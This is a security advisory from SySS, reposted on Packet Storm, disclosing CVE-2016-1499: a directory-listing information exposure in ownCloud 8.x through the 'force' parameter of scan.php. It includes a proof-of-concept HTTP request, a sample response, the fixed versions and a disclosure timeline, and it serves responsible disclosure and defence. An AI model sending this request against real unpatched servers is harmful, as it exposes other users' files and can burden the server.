exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ownCloud 8.2.1 / 8.1.4 / 8.0.9 Information Exposure

ownCloud 8.2.1 / 8.1.4 / 8.0.9 Information Exposure
Posted Jan 7, 2016
Authored by Dr. Erlijn van Genuchten | Site syss.de

ownCloud versions 8.2.1 and below, 8.1.4 and below, and 8.0.9 and below suffer from an information exposure vulnerability via directory listings.

tags | exploit
advisories | CVE-2016-1499
SHA-256 | 2a03e49b47f5b92a36e0f7c8b25d095b6e9255abca3e8fe34b1f15409b04a89c

ownCloud 8.2.1 / 8.1.4 / 8.0.9 Information Exposure

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2015-062
Product: ownCloud
Manufacturer: ownCloud Inc., Community
Affected Version(s): ownCloud <= 8.2.1, <= 8.1.4, <= 8.0.9
Tested Version(s): 8.1.1, 8.1.4
Vulnerability Type: Information Exposure Through Directory Listing (CWE-548)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2015-07-17
Solution Date: 2015-12-23
Public Disclosure: 2016-01-06
CVE Reference: CVE-2016-1499
Author of Advisory: Dr. Erlijn van Genuchten (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

ownCloud is a software suite for creating and using file hosting
services.

The ownCloud Web site describes the software as follows (see [1]):

"ownCloud is a self-hosted file sync and share server. It provides access
to your data through a web interface, sync clients or WebDAV while
providing a platform to view, sync and share across devices easily — all
under your control. ownCloud’s open architecture is extensible via a
simple but powerful API for applications and plugins and it works with
any storage."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

ownCloud is vulnerable to information exposure through directory
listing. It is possible with a normal user to get information about
the complete directory structure and included files of all users.
The 'force' parameter in the script (index.php/apps/files/ajax/scan.php)
can easily be manipulated, by setting its value to 'true'.

This vulnerability can potentially be used for denial-of-service attacks
if the selected directory is deep enough, because to index many
directories requires high computational effort. In addition, sensitive
information from other users is exposed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

With the following HTTP GET request, it is possible to see the
directories of other users.


GET /index.php/apps/files/ajax/scan.php?force=true&dir=&requesttoken=<VALIDREQUESTTOKEN> HTTP/1.1
Host: [HOST]
Accept: text/event-stream
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: [REFERER]
Cookie: [COOKIES]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache


Server response (shortened):

event: user
data: "[ID]"

event: folder
data: "\/"

event: count
data: 21

event: count
data: 42

event: count
data: 63

event: folder
data: "\/[ID]"

event: folder
data: "\/[ID]\/cache"

event: folder
data: "\/[ID]6\/files"

event: folder
data: "\/[ID]\/files_encryption"

[...]

event: folder
data: "\/[ID]\/files_encryption\/keys\/files\/[FILENAME].zip"

event: folder
data: "\/[ID]\/files_encryption\/keys\/files\/[FILENAME].zip\/OC_DEFAULT_MODULE"

event: folder
data: "\/[ID]\/files_encryption\/keys\/files\/[FILENAME].pptx"

[...]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to information by ownCloud, the described security issue has
been fixed in software releases:
– ownCloud 8.2.2
– ownCloud 8.1.5
– ownCloud 8.0.10

Please contact the manufacturer for further information or support or
visit https://owncloud.org/security/advisory/?id=oc-sa-2016-002.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-11-17: Vulnerability reported to manufacturer
2015-12-23: Patch published by manufacturer
2016-01-06: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] ownCloud, Web Site
https://owncloud.org/
[2] SySS Security Advisory SYSS-2015-062
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-062.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Dr. Erlijn van Genuchten of the
SySS GmbH.

E-Mail: erlijn.vangenuchten@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc
Key ID: 0xBD96FF2A
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and
without warranty of any kind. Details of this security advisory may be updated
in order to provide as accurate information as possible. The latest version of
this security advisory is available on the SySS Web site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJWjiHkAAoJEAylhje9lv8qzJYP/jCxIJ64SWR8lKEvZxEQDSbr
L0XBUOBCtl1K0BQnTVXrSOq5lph8VPfJGdxkC35QWDX9zt1mGJxDqvRuC8ugG5ZU
SqnAimeXWOCeNuZOFWjiynKntxbmqSVfSKws2ZwvR7TYWz8t5n2igflfeIgeHtie
Z5lMPWTAzrU6qcDP1zJBG4hnVIuDorDqsMvuDFY0SSzZgBf+nJ5ovE8P6kvnYs90
eEtZ91oZaGICfGuSaLYu0/GOQ34Ww2v9/9CQyBVukaySJX51d02putfqfnYxZPSx
TrkWPwc9BUGZF0VK+1qwgP0+hr67yz7+ypCQ6KdmHz6chPIlyVk/fAo9X/weuTlA
H2n78Pb1ICHRlsSa8gyVFOJeTTqsmF9AAIWeT5TrcXHlNK2FY46Vl21jxFtNtjeN
wdTfzVGvwJjIDkq6iikg4/yaz3xduCilfJd8vKf1MNki/4Lw1oT+5KGuHJQPAPTD
3nvN+gU4qJxRt2YPaXEvIavpFszkG0GCqZJ5BX7B4b8zW15fl+E5W/ewp95J9FWS
x+s4Vn/7uvrtOpNAcUq0HPLbG5OtgM4DyHceZoQlz1g5fsh8gbrSM7ZKQjKTS3Vb
+MGCAXdwTNwa/cka5WKT16/2959uwTRZO8jQloINfWOwUyweC+JIYPZ2OQsmxLop
ceqeLBdlztCJvqeu5rJY
=tGfZ
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    6 Files
  • 28
    May 28th
    12 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close